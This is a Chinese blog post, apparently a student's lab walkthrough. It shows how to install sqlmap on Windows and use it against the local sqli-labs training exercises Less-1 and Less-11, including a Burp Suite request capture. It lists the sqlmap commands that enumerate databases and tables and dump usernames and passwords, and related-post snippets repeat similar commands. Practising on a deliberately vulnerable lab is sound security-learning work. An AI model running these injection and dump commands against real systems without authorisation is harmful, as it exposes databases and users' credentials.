windows下安装sqlmap,并且使用sqlmap对sqli less-1 和less-11进行扫描

原创 已于 2022-04-14 11:14:05 修改 · 2.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-04-14 11:11:22 首次发布
这篇博客详细介绍了如何使用sqlmap工具对Less-1和Less-11进行扫描,包括爆破数据库、表结构和字段数据的过程,涉及了从下载安装、终端操作到抓包分析的步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Ⅰ.sqlmap安装:

  • 在sqlmap.org网站中下载sqlmap压缩包,然后解压缩,同时下载安装python。

⑤将解压缩后的文件夹放在桌面上。

Ⅱ对less-1进行扫描

  • 打开终端,输入

C:\Users\lili>pythonC:\Users\lili\Desktop\sqlmapproject-sqlmap-22e7b35/sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 –dbs

——爆数据库:共七个数据库

  • 继续输入

C:\Users\lili>pythonC:\Users\lili\Desktop\sqlmapproject-sqlmap-22e7b35\sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security –tables

——爆security数据库中的表 :共四个表

  • 继续输入

C:\Users\lili>pythonC:\Users\lili\Desktop\sqlmapproject-sqlmap-22e7b35\sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users -C id,password,username --dump

——爆字段:

Ⅲ.对less-11进行扫描

  • 打开火狐代理和burpsuite代理,对输入的username和password进行抓包,将抓到的包保存至文本文档中。

  • 使用sqlmap打开该文本文档。

输入

C:\Users\lili>python C:\Users\lili\Desktop\sqlmapproject-sqlmap-22e7b35\sqlmap.py -r C:\Users\lili\Desktop\burpsuite-catch.txt  --dbs  ※(sqlmap路径后面加/sqlmap.py   --dbs 是两个-)

——爆数据库:

  • -D security – tables

——爆表:

  • -D security -T users - columns

——爆列:

  • -D security -T users -C username,password – dump

——爆数据:

 

Windows主机sqlmap安装使用
XLbb的博客
05-07 6844
说明:sqlmap需下载python2.7.9版本、在win命令行运行。 1.1python安装: 设置环境变量:python的安装路径scripts路径添加到电脑主机环境变量 步骤:打开环境变量:【此电脑】--右击属性-高级系统设置--高级-环境变量--admin的用户变量--Path--编辑--添加C:\Python27\ScriptsC:\Python27\--确认关闭 2、下载sqlmap软件文件。 打开sqlmap目录,在sqlmap软件目录下输入cmd进入命令行
使用SQLMAP扫描步骤
qq_35773551的博客
06-20 8844
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。一、检测注入点是否可以利用    C:\Python27\sqlmap>python sqlmap.py -u "http://xxxxxx/products.asp?id=56" 参数:-u:指定注入点url,注意带入注入点如果成功,那么会...
SQLmap快速上手一篇就够了!超实用
最新发布
BanDaPao的博客
07-07 554
SQLmap 是开源渗透测试工具,专注自动化 SQL 注入漏洞检测与利用,支持多种数据库。其功能涵盖目标探测、请求控制、注入方式选择等,能列出数据库、表、列并导出数据。还具备高级防御规避技术,如优化扫描速度、混淆技术等。但请注意,该工具仅限用于合法授权测试场景,须严格遵守法律法规。
sqlmap使用(以sqli-lab为例)
wusimin432503的博客
04-09 915
5.dump出数据:sqlmap -u -D security -T users -C id,password,username --dump。4.爆出指定表的列名: sqlmap -u 网址 -D 'security' -T 'users' --columns。5.dump出数据: sqlmap -r 文件位置 -D xxx -T xxx -C xxx --dump。4.爆出列名:sqlmap -r 文件位置 -D xxx -T xxx -columns。sqlmap -r 文件位置。
Windows系统如何使用sqlmap
u013473481的专栏
01-14 1211
需要安装python,不能安装最新版本的python3.2.2只能安装2.6-3.0这些版本,包括2.6,3.0   这里,我提供一个Python的安装包。点击这里下载→ Python2.7   然后下载sqlmap最新版本。点击这里下载→ 官方下载   下载好之后,解压。   在我机子上,我把sqlmap文件夹拷在了E盘      然后打开Python的安装文件   
sqlmap使用_SQLMapSQLi注入防御
weixin_39557402的博客
12-08 337
第一部分:Sqlmap使用1.1 sqlmap介绍1. 前边说了一些sql注入的基础语句,但是手工注入很麻烦,我们可以借助sqlmap这个强大的sql注入工具,进行数据的获取.2. sqlmap介绍(1)#sqlmap是一种开源的渗透测试工具,可以自动检测利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并...
网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump
2401_84248681的博客
04-29 337
错误回显sql语句猜测。
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 180
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
Less-1sqlmap自动注入攻击)--sqli
XiaoYeZhu_1314的博客
01-28 876
表明有四种注入漏洞:boolean-based blind,error-based,time-based blind,UNION query。指定用于身份验证的cookie进行注入测试。打开火狐浏览器,进入sqli第一关的页面。尝试获取操作系统级别的shell访问权限。指定POST请求的数据进行注入测试。查看结果发现,可以访问到名字密码。遇见[y/n]都直接回车跳过,得到。设置测试的深度级别(1-5)设置测试的风险级别(1-3)获取数据库管理系统的信息。获取数据库中表的信息。获取数据库表中的数据。
sqlmap使用教程(sqli-labs11-20)
小同的博客
05-22 895
sql-labs-less11~less17常规 POST 注入 sql-labs-less18 Header injection - Uagent sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 * 或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入 sql-labs-less19 Header injection ...
网络安全-sqlmap实战之sqlilabs-Less4_用kali中的sqlmap工具完成sqli-labs less-4
2401_84254087的博客
05-02 426
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
sqlmap漏洞扫描工具
10-18
SQLMAP是一款跨平台,开源的SQL注入“企业级”工具,但同时也是很适合个人学习的工具,功能强大.
SQLMap 扫描利用SQL注入
无痕的博客
12-21 1806
SQLmap工具安装更新,结合DVWA演示使用
SQL注入漏洞扫描---sqlmap
嘿嘿嘿
05-03 4106
数据库--数据表---字段---字段内容一站式识别
Windows安装sqlmap
CoffeMilk的博客
04-13 634
一、安装sqlmap准备 ①python的安装包【python下载】(这里建议下载python2.7.x版本) ②sqlmap文件【sqlmap下载】 ③Windows自带的控制台CMD 二、安装内容 2.1安装python2.7.9示例步骤如下所示: 最后等待安装完成即可 2.2、下载sqlmap解压,且将解压后的内容放到python的安装目录下的(新建sqlmap文件夹中) 2.3、在桌面创建sqlmap的命令控制台CMD 输入CMD的路径..
SQLmap安装
weixin_42515203的博客
05-12 754
SQLmap安装使用
sqlmap学习(sqli-labs为示例)
quan9i的博客
02-17 5326
文章目录前言sql-map部分指令- -is-dba- -current-D,-T,-C- -dump-v--batchget类型检测可注入类型获取数据库获取表获取列名获取字段信息post类型准备工作检测可注入类型破解数据库方法一方法二破解数据表方法一方法二获取列名方法一方法二获取字段信息方法一方法二 前言 由于python学的啥也不是,脚本写的也很不咋滴(不会写),因此来学习sqlmap使用,本人只是小白,如果出现错误还请各位师傅多多指正。 sql-map部分指令 - -is-dba --is-dba判
sqli-labs之sqlmap初体验
rev1ve的博客
08-07 769
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式请求参数,总之写下这篇博客记录我的学习过程。
安全圈最被低估的10个神器:一个比一个强大,大佬都在偷偷用!零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
02-14 1316
这些冷门的网络安全工具是你工具箱中的强大补充,它们提供了独特的功能,覆盖从侦察到漏洞利用的多个环节。虽然像 Nmap Burp Suite 这样的工具不可或缺,但探索像 CyberChef、BloodHound Impacket 这样的“宝藏工具”能让你在网络安全工作中更加高效灵活。
sqli-labs less-11hackbar实现
03-25
`sqli-labs` 是一个用于学习实践 SQL 注入技术的开源项目,其中 `less-11` 提供了一个基于布尔盲注的学习场景。 为了通过浏览器插件 HackBar 来完成针对 `sqli-labs less-11` 的 SQL 注入测试,可以按照以下方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值